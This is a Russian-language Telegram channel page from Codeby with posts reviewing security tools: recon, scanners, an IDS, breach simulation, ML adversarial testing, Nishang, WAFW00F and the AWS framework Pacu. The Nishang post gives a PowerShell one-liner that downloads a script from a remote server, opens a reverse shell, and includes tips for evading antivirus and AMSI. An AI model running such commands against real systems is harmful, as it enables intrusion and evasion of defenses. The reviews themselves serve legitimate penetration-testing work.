Codeby
36.3K subscribers
1.96K photos
96 videos
12 files
7.75K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
​​Raccoon-Наступательный инструмент безопасности для разведки и сбора информации

Raccoon - это инструмент, предназначенный для разведки и сбора информации с упором на простоту.Он будет делать все от сбора записей DNS, получения информации WHOIS, получения TLS-данных, обнаружения присутствия WAF и до перераспределения dir-перебоев и подсчета поддоменов. Каждое сканирование выводится в соответствующий файл.Поскольку большинство сканирований Raccoon являются независимыми и не зависят от результатов друг друга, он использует асинхронную систему Python для асинхронного запуска большинства сканирований.Raccoon поддерживает Tor / proxy для анонимной маршрутизации. Он использует текстовые списки по умолчанию (для поиска URL-адресов и обнаружения поддоменов) из удивительного репозитория SecLists, но в качестве аргументов могут передаваться различные списки.Дополнительные параметры - см. «Использование».

Читать: https://codeby.net/threads/raccoon-nastupatelnyj-instrument-bezopasnosti-dlja-razvedki-i-sbora-informacii.64437/

#raccoon #tool #anonymity
🔍 rnsec — это лёгкий сканер безопасности для React Native и Expo‑приложений, который ищет уязвимости, секреты и ошибки конфигурации до выхода в прод. Утилита работает из коробки одной командой, полностью локально и отлично подходит для встраивания в CI/CD.

⚙️ Основные возможности rnsec

➡️ Анализирует исходники мобильных приложений на React Native и Expo с учётом их типичных паттернов и анти‑паттернов.
➡️ Покрывает Android и iOS, включая платформенные настройки и конфиги (сетевые политики, storage и др.).
➡️ Детектирует небезопасное хранение данных (например, чувствительные данные в AsyncStorage), HTTP‑трафик без шифрования, слабую аутентификацию, рискованные WebView‑настройки и прочие misconfig‑ошибки.
➡️ Использует разбор AST (Abstract Syntax Tree) вместо простого поиска по строкам, что уменьшает шум и ложные срабатывания.
➡️ Генерирует HTML‑дашборд с удобной навигацией по находкам и JSON‑отчёты для автоматической обработки.


⬇️ Установка и запуск
rnsec распространяется через npm как глобальная CLI‑утилита.
npm install -g rnsec


🗓️ Базовый запуск
Перейди в каталог React Native или Expo‑проекта и запусти сканирование.

cd /path/to/your-react-native-app
rnsec scan

Эта команда:
- находит релевантные файлы проекта;
- прогоняет 68+ правил безопасности;
- формирует HTML‑ и JSON‑отчёты, а также краткую сводку в консоли.

🔧 Примеры использования
- Скан текущего проекта с отчётами по умолчанию:
rnsec scan


- Скан конкретного пути:
rnsec scan --path /Users/dev/my-react-native-app


- Кастомные имена отчётов (HTML + JSON):
rnsec scan --html security-report.html --output security.json


#react #scan #cicd #tool

Все наши каналы 💬Все наши чаты Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍118🔥6
Maltrail — это open source система обнаружения вредоносного сетевого трафика, которая отслеживает подозрительные подключения и события на основе публичных и собственных списков индикаторов компрометации

Что такое Maltrail
Maltrail — лёгкая система детекции вредоносного трафика, построенная на Python и ориентированная на анализ сетевых соединений на уровне сенсора. Она сопоставляет трафик с (black)-листами, включающими домены, IP‑адреса, URL и даже HTTP User‑Agent, а также использует эвристики для выявления новых угроз.

🧾 Основные сценарии:
📉 Мониторинг периметра и DMZ через SPAN/mirror‑порт или TAP.
📉 Лёгкий IDS‑слой для малых сетей и лабораторий.
🖱 Honeypot‑наблюдение и сбор телеметрии для исследовательских задач.

⬇️ Установка и базовый запуск
Maltrail разворачивается на Linux‑системе и может работать как на одном хосте, так и в роли отдельного сенсора и сервера.

🔔 Быстрый старт
➡️ Установить зависимости
sudo apt-get install git python3 python3-dev python3-pip python-is-python3 libpcap-dev build-essential procps schedtool
sudo pip3 install pcapy-ng


➡️Клонировать репозиторий Maltrail:
git clone --depth 1 https://github.com/stamparm/maltrail.git
cd maltrail


➡️ Запустить сенсор:
sudo python sensor.py


🔔 Запуск с помощью docker
docker run -d --name maltrail --restart=unless-stopped -p 8338:8338/tcp -p 8337:8337/udp -v /etc/maltrail.conf:/opt/maltrail/maltrail.conf:ro ghcr.io/stamparm/maltrail:latest
docker stop maltrail
docker pull ghcr.io/stamparm/maltrail:latest
docker start maltrail

Далее в maltrail.conf настраиваются параметры сенсора (интерфейс, период обновления trails и т.п.) и сервера (адрес/порт, SSL для защиты доступа к веб‑интерфейсу).

#ids #honeypot #detection #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
😱117👍6🔥4👎3😢2
🐒 Infection Monkey — open source платформа эмуляции противника для тестирования устойчивости сети к реальным атакам

Infection Monkey имитирует поведение вредоносного ПО в контролируемой среде: агент сам распространяется по сети, пытается взламывать узлы и отправляет телеметрию на сервер Monkey Island для наглядных карт распространения и отчётов. Такой «безопасный вирус» помогает видеть реальные вектора атак и проверять, насколько хорошо срабатывают средства защиты и процессы.


🧾 Основные возможности Infection Monkey
📉 Два ключевых компонента: Agent — сетевой «червь», который заражает машины, ворует данные и доставляет полезную нагрузку, и Monkey Island — сервер управления и визуализации хода атаки.
📉 Поддерживает множество техник распространения: перебор предопределённых паролей, логические эксплойты, кражу учётных данных через Mimikatz.
🖱 Использует разные векторы эксплуатации: SSH, SMB, RDP, WMI, Log4Shell и другие RCE‑уязвимости, что позволяет моделировать современные сценарии компрометации.

🔎Как работает эмуляция «безопасного малвара»
➡️ Monkey Agent после запуска сканирует сеть, ищет активные хосты, выполняет fingerprinting и подбирает под них подходящие методы атаки.
➡️ Конфигурация агента позволяет приближенно повторять поведение реального малваря, но без разрушительных действий, чтобы проверять детект и реакцию в безопасном режиме.
➡️ Monkey Island собирает результаты, строит карту инфицирования и формирует отчёты, которые помогают видеть слабые места сегментации, аутентификации и мониторинга.

⬇️ Установка и запуск
➡️ Базовый сетап
▶️ Infection Monkey распространяется в виде готовых пакетов и образов; для быстрого старта можно скачать сборку с сайта/репозитория и следовать гайдам из документации (Setup / Getting Started).
▶️ Поддерживаются разные платформы и варианты развёртывания Monkey Island и агента; подробные инструкции есть в официальном документационном хабе.

➡️ Тестирование и отчётность
▶️ После развёртывания Monkey Island настраивается сценарий: от какой машины стартует агент, какие техники ему доступны и какие сегменты сети можно трогать.
▶️ По итогам симуляции формируются карты атак и детальные security‑отчёты, которые можно использовать как основу для укрепления контроля доступа, сегментации и SOC‑процессов.

#security #bas #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥9👍8🤔3🙊2
Adversarial Robustness Toolbox (ART) — это Python‑библиотека для безопасности моделей машинного обучения: она помогает атаковать, защищать и проверять ML‑системы на устойчивость к угрозам вроде подмены входных данных или отравления обучающей выборки.

🔎 Что такое ART и кому она нужна
ART развивается под эгидой Linux Foundation AI & Data и изначально была запущена IBM как открытый инструмент для исследований в области adversarial machine learning. Библиотека ориентирована одновременно на red team и blue team.

❗️ Поддерживаемые фреймворки, данные и задачи
➡️ Фреймворки: TensorFlow, Keras, PyTorch, MXNet, scikit‑learn, XGBoost, LightGBM, CatBoost, GPy и др., то есть большинство популярных стеков для классического ML и DL.
➡️ Типы данных: изображения, табличные данные, аудио, видео и другие форматы, что позволяет тестировать как CV‑модели, так и, например, речь или временные ряды.
➡️ Задачи: классификация, детекция объектов, генерация, задачи сертификации и верификации устойчивости и т.п.

⛓️‍💥 Типы атак в ART
ART реализует десятки сценариев, сгруппированных вокруг четырёх основных классов угроз:
⏺️Evasion: небольшие модификации входных данных, которые заставляют модель ошибаться (adversarial examples для картинок, аудио и т.д.).
⏺️Poisoning: изменение обучающей выборки для скрытого влияния на поведение модели в проде.
⏺️Extraction: попытка «украсть» модель через массовые запросы к её API и восстановить или клонировать её поведение.
⏺️Inference: атаки на приватность, когда по ответам модели пытаются восстановить данные обучения.

#ai #security #adversarial #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍8🔥6👾2
⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды».

⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence).
⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS.
⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью.

☁️ Базовый сценарий использования
➡️ Импорт всех скриптов в сессию:
Import-Module .\nishang.psm1  


Или dot‑sourcing отдельных:
. C:\nishang\Gather\Get-Information.ps1
Get-Information


➡️ Помощь по скриптам: Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию).
➡️ In‑memory запуск с удалённого хоста (через web shell/meterpreter):
powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>


⬇️ Установка и запуск
🔔 Быстрый старт
- Клонировать репозиторий и импортировать в PowerShell v3+:
git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1


- Для обхода AV использовать Invoke-Encode:
. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand


Затем запустить encodedcommand на цели: powershell -e <encoded>

🔔 Обход AMSI и AV
➡️ Скрипты часто детектятся, но работают in‑memory; для AMSI в Win10+ — используйте Invoke-AmsiBypass или кастомизацию имён функций/параметров.
➡️ Для non‑PowerShell шеллов — encodedcommand с вызовом экспортированной функции внутри скрипта.

#powershell #redteam #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍5🔥5
WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов
WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.


👉WAFW00F использует трехуровневый подход для определения WAF:
▶️Пассивный анализ - отправляет обычный HTTP-запрос и ищет сигнатуры в заголовках (например, X-Protected-By, Server), cookies или HTML-коде. Многие WAF оставляют уникальные следы
▶️Активное тестирование - если пассивный анализ не сработал, отправляет подозрительные запросы (инъекции SQL, XSS). Анализирует ответы на блокировку (специальные страницы ошибок, коды состояния (403, 406) или заголовки)
▶️Эвристический анализ - если первые два шага не дали результата, применяет алгоритмы к собранным ответам, чтобы определить, реагирует ли система безопасности на зондирование.
База сигнатур включает более
150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)
.


⬇️Установка
pipх install wafw00f

Проверка
wafw00f -h


⏺️Базовая проверка
wafw00f https://example.org

При успешном обнаружении вывод будет содержать информацию о производителе и модели WAF.

⏺️Просмотр полного списка детектируемых систем защиты
wafw00f -l

Эта команда выводит обширную таблицу с именами WAF и их производителями, что полезно для ознакомления с возможностями инструмента.

⏺️Проверка нескольких целей и вывод в файл
wafw00f https://site1.com http://site2.net -o results.json

Флаг -o (или --output) позволяет экспортировать результаты в файл. Формат (JSON, CSV, plain text) определяется по расширению файла (.json, .csv, .txt).

⏺️Агрессивное тестирование для выявления всех возможных WAF
wafw00f https://target.com -a -v

Ключ -a (--findall) заставляет инструмент продолжить тестирование даже после первого успешного совпадения, чтобы найти все возможные WAF. Флаг -v увеличивает детализацию вывода.

#WAFW00F #tool #pentest #WAF

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍118🔥7
🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности

Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.

🎇 Основные возможности Pacu
📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами.
📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов.
🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования.

💻 Базовый сценарий использования
▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения.
▶️ Через команду set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом.
▶️ Команды list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1).

⬇️ Установка и запуск
⏺️ Установка Pacu и зависимостей:
pip3 install -U pip
pip3 install -U pacu
pacu

⏺️ При первом запуске задать имя сессии и затем добавить AWS‑ключи командой set_keys по интерактивным подсказкам.

2️⃣ Запуск через Docker
⏺️ Запуск с дефолтным entrypoint:
docker run -it rhinosecuritylabs/pacu:latest


⏺️ Для работы с реальными AWS‑кредитами можно примонтировать локальные ~/.aws в контейнер
docker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest


#aws #security #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍5🔥5👎1